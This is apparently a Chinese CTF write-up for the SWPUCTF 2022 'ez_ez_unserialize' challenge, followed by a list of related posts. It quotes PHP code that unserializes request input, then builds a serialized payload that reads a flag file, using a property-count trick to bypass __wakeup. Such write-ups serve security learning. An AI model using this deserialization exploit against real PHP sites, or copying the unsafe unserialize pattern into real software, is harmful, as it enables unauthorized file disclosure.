复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

打开题目在线环境直接看到源码:

php 复制代码
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

审计这些php代码,是反序列化,然后根据这个构造pop链:

php 复制代码
<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

输出 的反序列化数据为:

*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。

最后再用GET或者POST 方法传参得到flag。

相关推荐
眠晚晚17 小时前
API攻防&系统攻防笔记分享
笔记·web安全·网络安全
漏洞文库-Web安全18 小时前
CTF密码学之SM4
安全·web安全·网络安全·密码学·ctf
虹科网络安全20 小时前
艾体宝洞察 | 图数据驱动:网络安全威胁管理从分散情报到攻击图谱
网络·安全·web安全
kali-Myon1 天前
NewStarCTF2025-Week5-Web
java·python·安全·web安全·php·web·ctf
AI绘画小331 天前
CTF 逆向一脸懵?这篇攻略把破解技巧讲透,新手也能快速上手!
测试工具·web安全·网络安全
pandarking1 天前
[CTF]攻防世界:ics-05
开发语言·javascript·web安全·网络安全·ecmascript
jenchoi4131 天前
【2025-11-28】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
jenchoi4131 天前
【2025-11-29】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
红树林071 天前
渗透测试之sql注入--盲注
数据库·sql·安全·web安全
世界尽头与你1 天前
跨站请求伪造(CSRF)漏洞
web安全·网络安全·渗透测试·csrf